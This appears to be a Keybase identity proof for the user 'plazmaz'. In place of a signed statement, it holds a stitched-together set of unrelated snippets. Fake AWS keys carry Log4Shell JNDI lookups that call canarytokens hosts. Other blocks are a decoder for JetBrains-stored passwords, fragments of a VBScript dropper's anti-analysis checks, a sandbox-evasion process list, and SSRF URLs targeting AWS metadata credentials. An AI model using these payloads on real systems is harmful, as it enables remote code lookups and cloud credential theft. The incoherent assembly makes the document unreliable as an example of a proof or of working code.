I hereby claim:
- I am plazmaz on github.
- I am plazmaz (https://keybase.io/plazmaz) on keybase.
- I have a public key ASDCStXBaUDQPBh36YOQRg_OttfvktUvoBPSi09wFgUwtgo
To claim this, I am signing this object:
```
AWS_ACCESS_KEY_ID=${jndi:ldap://x${hostName}.L4J.i3bjh8gykx4teaeyhsck7ormx.canarytokens.com/a}
AWS_SECRET_ACCESS_KEY=7638792F423F4528482B4B6250655368566D597133743677397A24432646294A404E635166546A576E5A7234753778214125442A472D4B6150645367556B5870${jndi:ldap://x${hostName}.L4J.itkyt8sp20uipz73hfob7x8xt.canarytokens.com/skey}
```

```
# AWS Credentials file
[${jndi:ldap://x${hostName}.L4J.i3bjh8gykx4teaeyhsck7ormx.canarytokens.com/a}]
aws_access_key_id = yLryKGwcGc3ez9G8YAnjeYMQOc${jndi:ldap://x${hostName}.L4J.i3bjh8gykx4teaeyhsck7ormx.canarytokens.com/a} # Informative, can't be used alone
aws_secret_access_key = nAH2VzKrMrRjySLlt8HCdFU3tM2TUuUZgh39NX${jndi:ldap://x${hostName}.L4J.i3bjh8gykx4teaeyhsck7ormx.canarytokens.com/a}
```
```yaml
notify:
  - type: email
    properties:
      host: ""
      host_user: ""
      host_pass: ""
      port: 587
      use_tls: True
      from: ""
      enabled: false
```
```python
# Source file:
# http://git.jetbrains.org/?p=idea/community.git;a=blob_plain;f=platform/platform-api/src/com/intellij/openapi/util/PasswordUtil.java;hb=HEAD
# PasswordUtil.decodePassword
def decode_jebtrains(encoded):
    out = ''
    # Each character is stored as 4 hex digits, XORed with 57258 (0xDFAA).
    for i in range(0, len(encoded), 4):
        out += chr(int(encoded[i:i+4], 16) ^ 57258)
    return out
# PasswordUtil.encodePassword
```
```vb
' If these checks fail, this dropper will die in a recursive loop
' Checks if files exist in tmp
SKXSwgvzc
' Checks RAM >= 1024
uOCNREVZV
' Checks for debuggers, AVs, dev tools, and sniffing tools. Fails if any are present.
MHtrCHZpL
' Checks CPU cores >= 3
XWKtvlOt
' Checks disk space >= 60 GB
```
```vb
' Usage: cscript decode.vbs <array>
' Example:
' cscript decode.vbs "Array(g6,u7,s8,d4,z3,u7,b6,l5,j4,e9,k7,z1,k7)"
' returns qMUuDMFaZ.txt
conST r2=27
CONsT rr2=38
coNSt C5=42
cOnST D4=130
ConST t=132
coNst g2=146
```

```
cis.exe
cmdvirth.exe
alive.exe
filewatcherservice.exe
ngvmsvc.exe
sandboxierpcss.exe
analyzer.exe
fortitracer.exe
nsverctl.exe
sbiectrl.exe
```
```
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
```